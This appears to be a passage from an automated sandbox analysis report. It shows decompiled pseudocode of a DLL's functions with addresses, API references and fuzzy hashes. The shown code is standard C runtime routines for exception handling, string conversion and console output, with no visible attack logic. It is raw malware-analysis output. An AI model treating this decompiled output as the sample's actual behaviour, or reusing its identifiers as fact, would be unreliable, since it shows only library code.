			E6DA5C588(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x6da811e0);
				E6DA59CA0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E6DA5AB10(_t107, E6DA5A8AF(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E6DA5AB10(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x6daa54e4; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x6da7415c();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E6DA60BF9(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x6da81200);
									E6DA59CA0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E6DA5C588(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E6DA5D288(_t103, _t108[0x18], E6DA5A8AF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E6DA5D298(_t103, _t108[0x18], E6DA5A8AF( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E6DA5A8AF();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x6da5c588
0x6da5c58a
0x6da5c58f
0x6da5c594
0x6da5c596
0x6da5c599
0x6da5c59e
0x6da5c6ae
0x6da5c6ae
0x6da5c6ae
0x00000000
0x6da5c5ad
0x6da5c5ad
0x6da5c5b2
0x6da5c5bc
0x6da5c5be
0x6da5c5c3
0x6da5c5c8
0x6da5c5c8
0x6da5c5ca
0x6da5c5cd
0x6da5c5d2
0x6da5c5f4
0x6da5c5f4
0x6da5c5f7
0x6da5c5fa
0x6da5c618
0x6da5c61b
0x6da5c65a
0x6da5c65d
0x6da5c660
0x6da5c685
0x6da5c687
0x00000000
0x6da5c689
0x6da5c689
0x6da5c68b
0x00000000
0x6da5c68d
0x6da5c68d
0x6da5c692
0x6da5c696
0x6da5c696
0x6da5c697
0x00000000
0x6da5c697
0x6da5c68b
0x6da5c662
0x6da5c662
0x6da5c664
0x00000000
0x6da5c666
0x6da5c666
0x6da5c668
0x00000000
0x6da5c66a
0x6da5c67b
0x00000000
0x6da5c680
0x6da5c668
0x6da5c664
0x6da5c61d
0x6da5c61d
0x6da5c621
0x00000000
0x6da5c627
0x6da5c627
0x6da5c629
0x00000000
0x6da5c62f
0x6da5c636
0x6da5c63e
0x6da5c642
0x6da5c644
0x6da5c647
0x6da5c64c
0x6da5c64d
0x00000000
0x6da5c64d
0x6da5c647
0x00000000
0x6da5c642
0x6da5c629
0x6da5c621
0x6da5c5fc
0x6da5c5fc
0x00000000
0x6da5c5fc
0x6da5c5d9
0x6da5c5d9
0x6da5c5de
0x6da5c5e3
0x00000000
0x6da5c5e5
0x6da5c5e7
0x6da5c5f0
0x6da5c5ff
0x6da5c601
0x6da5c6c0
0x6da5c6c0
0x6da5c6c5
0x6da5c6c6
0x6da5c6c8
0x6da5c6cd
0x6da5c6d2
0x6da5c6d5
0x6da5c6d8
0x6da5c6db
0x6da5c6e4
0x6da5c6e4
0x6da5c6dd
0x6da5c6dd
0x6da5c6dd
0x6da5c6e7
0x6da5c6eb
0x6da5c6ee
0x6da5c6ef
0x6da5c6f0
0x6da5c6f1
0x6da5c6f4
0x6da5c6fd
0x6da5c6fd
0x6da5c700
0x6da5c736
0x6da5c702
0x6da5c702
0x6da5c702
0x6da5c705
0x6da5c71c
0x6da5c71c
0x6da5c705
0x6da5c73b
0x6da5c745
0x6da5c751
0x6da5c60f
0x6da5c60f
0x6da5c614
0x6da5c615
0x6da5c64f
0x6da5c656
0x6da5c69a
0x6da5c69a
0x6da5c6a1
0x6da5c6b0
0x6da5c6b3
0x6da5c6bf
0x6da5c6bf
0x6da5c601
0x6da5c5e3
0x00000000
0x00000000
0x00000000
0x6da5c5b2

APIs

___AdjustPointer.LIBCMT ref: 6DA5C64F
___AdjustPointer.LIBCMT ref: 6DA5C672
___AdjustPointer.LIBCMT ref: 6DA5C70E

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 8195a0d9b7e246beabc30cdf98d5d1e714f810f43527648f5ea103c61d806c16
Instruction ID: e4520f69fce84feeb20c634b597b33e0803e243a1914708c38aa69eae594adf1
Opcode Fuzzy Hash: 8195a0d9b7e246beabc30cdf98d5d1e714f810f43527648f5ea103c61d806c16
Instruction Fuzzy Hash: 275113BA60C203AFEB158F54C940BBA77B5FF40314F14512DE91157A95E731EAE0CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6DA69272 Relevance: 6.1, APIs: 4, Instructions: 82
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA69272(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				intOrPtr _t17;
				intOrPtr _t18;
				intOrPtr _t20;
				intOrPtr _t30;
				char _t32;
				intOrPtr _t40;
				intOrPtr* _t42;
				intOrPtr _t43;

				_t42 = _a4;
				if(_t42 != 0) {
					_t32 = 0;
					__eflags =  *_t42;
					if( *_t42 != 0) {
						_t17 = E6DA68F81(_a16, 0, _t42, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t17;
						if(_t17 != 0) {
							_t40 = _a8;
							__eflags = _t17 -  *((intOrPtr*)(_t40 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t18 = E6DA60DEA(_a16, _t42,  *((intOrPtr*)(_t40 + 8)),  *((intOrPtr*)(_t40 + 0xc)));
								__eflags = _t18;
								if(_t18 != 0) {
									 *((intOrPtr*)(_t40 + 0x10)) = _t18 - 1;
									_t20 = 0;
									__eflags = 0;
								} else {
									E6DA603A9(GetLastError());
									_t20 =  *((intOrPtr*)(E6DA60403()));
								}
								L14:
								return _t20;
							}
							_t20 = E6DA69814(_t40, __eflags, _t17);
							__eflags = _t20;
							if(_t20 != 0) {
								goto L14;
							}
							goto L11;
						}
						E6DA603A9(GetLastError());
						return  *((intOrPtr*)(E6DA60403()));
					}
					_t43 = _a8;
					__eflags =  *((intOrPtr*)(_t43 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t43 + 8)))) = _t32;
						L2:
						 *((intOrPtr*)(_t43 + 0x10)) = _t32;
						return 0;
					}
					_t30 = E6DA69814(_t43, __eflags, 1);
					__eflags = _t30;
					if(_t30 != 0) {
						return _t30;
					}
					goto L6;
				}
				_t43 = _a8;
				E6DA60E0E(_t43);
				_t32 = 0;
				 *((intOrPtr*)(_t43 + 8)) = 0;
				 *((intOrPtr*)(_t43 + 0xc)) = 0;
				goto L2;
			}

0x6da69279
0x6da6927e
0x6da6929c
0x6da6929e
0x6da692a1
0x6da692ca
0x6da692d2
0x6da692d4
0x6da692ed
0x6da692f0
0x6da692f3
0x6da69301
0x6da6930e
0x6da69313
0x6da69315
0x6da6932e
0x6da69331
0x6da69331
0x6da69317
0x6da6931e
0x6da69329
0x6da69329
0x6da69333
0x00000000
0x6da69333
0x6da692f8
0x6da692fd
0x6da692ff
0x00000000
0x00000000
0x00000000
0x6da692ff
0x6da692dd
0x00000000
0x6da692e8
0x6da692a3
0x6da692a6
0x6da692a9
0x6da692b8
0x6da692bb
0x6da69292
0x6da69292
0x00000000
0x6da69295
0x6da692af
0x6da692b4
0x6da692b6
0x6da69337
0x6da69337
0x00000000
0x6da692b6
0x6da69280
0x6da69285
0x6da6928a
0x6da6928c
0x6da6928f
0x00000000

APIs

Part of subcall function 6DA68F81: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6DA67659,?,00000000,-00000008), ref: 6DA6902D

GetLastError.KERNEL32 ref: 6DA692D6
__dosmaperr.LIBCMT ref: 6DA692DD
GetLastError.KERNEL32(?,?,?,?), ref: 6DA69317
__dosmaperr.LIBCMT ref: 6DA6931E

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 7ae1fb3c8e2abc832fa533203df96daf060c33b2fe5805928d97164a5679b5cd
Instruction ID: fad14ffe1181fa4134542dc61c60b9df8a1c2921469785cf4b28f2b12ea66a02
Opcode Fuzzy Hash: 7ae1fb3c8e2abc832fa533203df96daf060c33b2fe5805928d97164a5679b5cd
Instruction Fuzzy Hash: 6B21F27160C386EFCB109F76CA8096AB7BDFF05768B058519E92897240D735ECC08BB1

Uniqueness

Uniqueness Score: -1.00%

Function 6DA60D0B Relevance: 6.1, APIs: 4, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6DA60D0B(intOrPtr* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16) {
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					if( *_t40 != 0) {
						_t15 = E6DA68F81(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						if(_t15 != 0) {
							_t38 = _a8;
							if(_t15 <=  *((intOrPtr*)(_t38 + 0xc))) {
								L10:
								_t16 = E6DA60DEA(_a16, _t40,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)));
								if(_t16 != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t16 - 1;
									_t18 = 0;
								} else {
									E6DA603A9(GetLastError());
									_t18 =  *((intOrPtr*)(E6DA60403()));
								}
								L13:
								L14:
								return _t18;
							}
							_t18 = E6DA60E28(_t38, _t15);
							if(_t18 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6DA603A9(GetLastError());
						_t18 =  *((intOrPtr*)(E6DA60403()));
						goto L14;
					}
					_t41 = _a8;
					if( *((intOrPtr*)(_t41 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = 0;
						_t18 = 0;
						 *((intOrPtr*)(_t41 + 0x10)) = 0;
						goto L14;
					}
					_t18 = E6DA60E28(_t41, 1);
					if(_t18 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6DA60EAD(_a8);
				return 0;
			}

0x6da60d11
0x6da60d16
0x6da60d2d
0x6da60d5f
0x6da60d69
0x6da60d82
0x6da60d88
0x6da60d96
0x6da60da3
0x6da60daa
0x6da60dc3
0x6da60dc6
0x6da60dac
0x6da60db3
0x6da60dbe
0x6da60dbe
0x6da60dc8
0x6da60dc9
0x00000000
0x6da60dc9
0x6da60d8d
0x6da60d94
0x00000000
0x00000000
0x00000000
0x6da60d94
0x6da60d72
0x6da60d7d
0x00000000
0x6da60d7d
0x6da60d2f
0x6da60d35
0x6da60d48
0x6da60d4b
0x6da60d4d
0x6da60d4f
0x00000000
0x6da60d4f
0x6da60d3b
0x6da60d42
0x00000000
0x00000000
0x00000000
0x6da60d42
0x6da60d1b
0x00000000

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64340462c9ccb5d2db8d91768f189389e13dc7cc351ba0ebd3af7298214622f4
Instruction ID: 7910f1ba5010f76723b71b0178cc131664c279fbf66f6cb573389f146778f221
Opcode Fuzzy Hash: 64340462c9ccb5d2db8d91768f189389e13dc7cc351ba0ebd3af7298214622f4
Instruction Fuzzy Hash: 1221CD3660C286EF87109F66CD8096AB7BDEF013697068619FA24D7140D770FCC187B8

Uniqueness

Uniqueness Score: -1.00%

Function 6DA71C86 Relevance: 6.0, APIs: 4, Instructions: 29
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E6DA71C86(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x6da83a00, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E6DA71C6F();
					E6DA71C31();
					_t13 = WriteConsoleW( *0x6da83a00, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}

0x6da71ca3
0x6da71ca7
0x6da71cb4
0x6da71cb9
0x6da71cd4
0x6da71cd4
0x6da71cda

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6DA71132,?,00000001,?,?,?,6DA6FF72,?,?,00000000), ref: 6DA71C9D
GetLastError.KERNEL32(?,6DA71132,?,00000001,?,?,?,6DA6FF72,?,?,00000000,?,?,?,6DA704FB,?), ref: 6DA71CA9

Part of subcall function 6DA71C6F: CloseHandle.KERNEL32(FFFFFFFE,6DA71CB9,?,6DA71132,?,00000001,?,?,?,6DA6FF72,?,?,00000000,?,?), ref: 6DA71C7F

___initconout.LIBCMT ref: 6DA71CB9

Part of subcall function 6DA71C31: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6DA71C60,6DA7111F,?,?,6DA6FF72,?,?,00000000,?), ref: 6DA71C44

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6DA71132,?,00000001,?,?,?,6DA6FF72,?,?,00000000,?), ref: 6DA71CCE

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: a7fe10ebe3b575fb38600e07da7ceff500a90c7d4c269ab169618222e0162f6e
Instruction ID: a72e930f67b89db08029180fd2044cde460ff1873c85366810b9cfc6a5a2116d
Opcode Fuzzy Hash: a7fe10ebe3b575fb38600e07da7ceff500a90c7d4c269ab169618222e0162f6e
Instruction Fuzzy Hash: D8F0373E448265BFCF222FD1CD18B997FB6FB0A361B058420FE1995110C7328861DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA60A0D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 6DA60A9D

Strings

pow, xrefs: 6DA60A75, 6DA60A92

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: 147ce50a082babb9446102d35d1da2db7b14ecd8fcd94a1fd08a96832a815f79
Instruction ID: 558f65f22c334a481d851d1007027cc677adefe1c833f8f53475d242cf3d015b
Opcode Fuzzy Hash: 147ce50a082babb9446102d35d1da2db7b14ecd8fcd94a1fd08a96832a815f79
Instruction Fuzzy Hash: 86513A65A1D383C6CB027B35C90136E3BB8EB53794F29CD59F4E1421D8EB3584D18A7A

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5C200 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6DA5C200(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E6DA7227E(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x6da83014;
				E6DA5C1C0(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x6da83014);
				E6DA5D30C(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E6DA5D490(_t77, 0xfffffffe, _t96, 0x6da83014);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E6DA5D430(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E6DA5C1C0(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x6da75010;
											if(__eflags != 0) {
												_t72 = E6DA71D30(__eflags, 0x6da75010);
												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x6da75010; // 0x6da5a783
													 *0x6da7415c(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E6DA5D470(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E6DA5D490(_t64, _t93, _t96, 0x6da83014);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E6DA5C1C0(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E6DA5D450();
										asm("int3");
										__eflags = E6DA5D4A7();
										if(__eflags != 0) {
											_t67 = E6DA5C53A(_t86, __eflags);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E6DA5D4E3();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}

0x6da5c200
0x6da5c207
0x6da5c20b
0x6da5c20c
0x6da5c212
0x6da5c21e
0x6da5c220
0x6da5c226
0x6da5c226
0x6da5c22f
0x6da5c231
0x6da5c234
0x6da5c237
0x6da5c23f
0x6da5c244
0x6da5c247
0x6da5c24a
0x6da5c251
0x6da5c2ad
0x6da5c2b0
0x6da5c2b8
0x6da5c2bf
0x00000000
0x6da5c2bf
0x00000000
0x6da5c253
0x6da5c253
0x6da5c259
0x6da5c25f
0x6da5c265
0x6da5c2d0
0x6da5c2d9
0x6da5c267
0x6da5c267
0x6da5c267
0x6da5c26d
0x6da5c270
0x6da5c273
0x6da5c276
0x6da5c279
0x6da5c27e
0x6da5c294
0x00000000
0x6da5c280
0x6da5c280
0x6da5c282
0x6da5c287
0x6da5c289
0x6da5c28c
0x6da5c28e
0x6da5c2a4
0x6da5c2c4
0x6da5c2c4
0x6da5c2c8
0x00000000
0x6da5c290
0x6da5c290
0x6da5c2da
0x6da5c2dd
0x6da5c2e3
0x6da5c2e5
0x6da5c2ec
0x6da5c2f3
0x6da5c2f8
0x6da5c2fb
0x6da5c2fd
0x6da5c2ff
0x6da5c30c
0x6da5c312
0x6da5c314
0x6da5c317
0x6da5c317
0x6da5c31a
0x6da5c31a
0x6da5c2ec
0x6da5c320
0x6da5c322
0x6da5c327
0x6da5c32a
0x6da5c32d
0x6da5c335
0x6da5c339
0x6da5c33e
0x6da5c33e
0x6da5c341
0x6da5c345
0x6da5c348
0x6da5c355
0x6da5c358
0x6da5c35d
0x6da5c363
0x6da5c365
0x6da5c36a
0x6da5c36f
0x6da5c371
0x6da5c37c
0x6da5c373
0x6da5c373
0x00000000
0x6da5c373
0x6da5c367
0x6da5c367
0x6da5c367
0x6da5c369
0x6da5c369
0x6da5c292
0x00000000
0x6da5c292
0x6da5c290
0x6da5c28e
0x00000000
0x6da5c297
0x6da5c297
0x6da5c299
0x6da5c2a0
0x00000000
0x6da5c2a2
0x00000000
0x6da5c2a0
0x6da5c265
0x00000000

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 6DA5C23F
__IsNonwritableInCurrentImage.LIBCMT ref: 6DA5C2F3

Strings

csm, xrefs: 6DA5C2DD

Memory Dump Source

Source File: 00000000.00000002.330209262.000000006DA51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA50000, based on PE: true

Associated: 00000000.00000002.330199814.000000006DA50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330273672.000000006DA74000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330296797.000000006DA83000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330307506.000000006DA84000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330371586.000000006DAA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.330436784.000000006DAA6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6da50000_loaddll32.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: 4967324b1c79a9249e7a573ae5b5409174d68f846e5e2f756e9736d7dc367be7
Instruction ID: 8361c9ae59593442f074311335fe62c9bada86b4bbb60f4f255a02cbcba2a578
Opcode Fuzzy Hash: 4967324b1c79a9249e7a573ae5b5409174d68f846e5e2f756e9736d7dc367be7
Instruction Fuzzy Hash: 1141A734908209DFCF00DFA8C880AAEBBB5BF45328F188155E9149B396D735D9A6CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6DA5CB89 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

